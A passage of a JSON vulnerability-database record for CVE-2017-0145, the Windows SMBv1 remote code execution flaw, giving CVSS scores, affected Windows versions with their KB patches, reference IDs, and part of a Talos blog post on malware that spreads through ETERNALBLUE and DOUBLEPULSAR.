"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-04T22:46:36", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "1284c0d389f95f11f504ec06c7d067e9", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T08:45:17", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4013198", "KB4012214", "KB3213986", "KB4012212", "KB3210721", "KB4012606", "KB4013429", "KB3210720", "KB3205409", "KB3212646", "KB4014077", "KB3205401", "KB4012215", "KB4012598", "KB4012213", "KB4012217", "KB3177186", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:45:17", "differentElements": ["msAffectedSoftware"], "edition": 88}], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-06T10:49:13", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-06T10:49:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB4012215", "KB3205409", "KB4012216", "KB4012213", "KB3177186", "KB3213986", "KB4012217", "KB3205401", "KB4012212", "KB4012598", "KB4014077", "KBMS16-110, 3187754", "KB4012214", "KB3210720", "KB3210721", "KB4013429", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}], "talosblog": [{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/pEAlAYO6L5w/adylkuzz-uiwix-eternalrocks.html", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6", "history": [], "modified": "2017-05-23T06:16:53", "lastseen": "2017-06-30T15:02:29", "published": "2017-05-22T15:14:00", "description": "When the WannaCry attack was launched a little over a week ago, it was one of the first large scale attacks leveraging the data that was leaked by the Shadow Brokers. At the time the real concern was how quickly we would begin to see other threats leverage the same vulnerabilities. Over the past couple of weeks, Talos has observed other malware variants that are using the ETERNALBLUE and DOUBLEPULSAR exploits from the Shadow Brokers release as part of their campaigns. Among them were Adylkuzz, Uiwix, and EternalRocks.<br /><br />Adylkuzz is a piece of malware that uses ETERNALBLUE and DOUBLEPULSAR to install cryptocurrency mining software on the infected system. This attack actually pre-dates the WannaCry attack and has continued to deliver the cryptocurrency miner.<br /><br />Uiwix uses a similar technique to install ransomware on the infected system. When the files are encrypted, the file names include \"UIWIX\" as part of the file extension. The key difference with this malware is that, unlike WannaCry, the Ransomware doesn't \"worm itself.\" It only installs itself on the system.<br /><a name='more'></a><br />Another malware variant we have observed being leveraged by attackers is known as EternalRocks. In this case the malware gains access to the system using ETERNALBLUE and DOUBLEPULSAR, but then just uses that access as a backdoor to install other malicious software on the infected system. One of the notable features of this malware is the 24 hour sleep/delay that the malware does before downloading the final payload which includes multiple other exploits from the Shadow Brokers dump. This is effective in evading things like sandbox environments.<br /><br />Following the success and the media coverage of WannaCry ransomware it was inevitable that we would see attacks using similar techniques to exploit vulnerable operating systems and spread other types of malware. <br /><br />Adylkuzz, Uiwix and Eternalrocks are just first examples of copycat spreading and is likely we will see more attacks using the same infection vector in the near future. The combination of the exploit (ETERNALBLUE) and the backdoor (DOUBLEPULSAR) allows attackers to install and run arbitrary code on the affected system.<br /><br />When mitigating risks, it is important to remember that the best way to prevent attacks exploiting CVE-2017-0143 to CVE-2017-148 as described in the Microsoft Security Bulletin <a href=\"https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\">MS17-010</a> is to apply the security update as soon as it is possible for your organization.<br /><br /><h2 id=\"h.o34dgu4n07ad\">Coverage</h2>Talos has observed an increase in malware leveraging these vulnerabilities. The final payload has no bearing on the protection for these attacks. As long as they are leveraging the exploits and tools disclosed by the Shadow Brokers, network based detection will stop it.<br /><br />These attacks are exploiting vulnerabilities that have been known for at least two months and, depending on the exploit, have been covered by NGIPS and NGFW technologies dating back to mid-March 2017. <br /><br />Snort Rule: 42329-42332, 42340, 41978, 42256 <br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on<a href=\"https://www.snort.org/products\"> </a><a href=\"https://www.snort.org/products\">Snort.org</a>.<br /><br />Additional ways our customers can detect and block this threat are listed below.<br /><br /><br /><div class=\"separator\" style=\"clear: 